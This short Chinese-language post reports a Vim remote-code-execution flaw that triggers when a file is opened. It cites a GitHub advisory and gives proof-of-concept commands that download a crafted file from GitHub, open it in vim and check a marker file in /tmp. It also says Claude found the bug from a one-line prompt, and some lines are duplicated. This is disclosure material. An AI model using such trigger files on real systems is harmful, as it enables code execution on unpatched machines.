vim存在rce,打开文件即可触发
https://github.com/vim/vim/security/advisories/GHSA-2gmj-rpqf-pxvh
poc
漏洞还是claude发现的,prompt只有一句话
https://github.com/vim/vim/security/advisories/GHSA-2gmj-rpqf-pxvh
poc
vim -version
# VIM - Vi IMproved 9.2 (2026 Feb 14, compiled Mar 25 2026 22:04:13)
wget https://raw.githubusercontent.com/califio/publications/refs/heads/main/MADBugs/vim-vs-emacs-vs-claude/vim.md
vim vim.md
cat /tmp/calif-vim-rce-poc漏洞还是claude发现的,prompt只有一句话
Somebody told me there is an RCE 0-day when you open a file. Find it.
GitHub
Vim tabpanel modeline escape affects Vim < 9.2.0272
Vim tabpanel modeline escape affects Vim < 9.2.0272
===================================================
Date: 30.03.2026
Severity: High
CVE: *not-yet-assigned*
CWE: Improper Neutralization ...
===================================================
Date: 30.03.2026
Severity: High
CVE: *not-yet-assigned*
CWE: Improper Neutralization ...
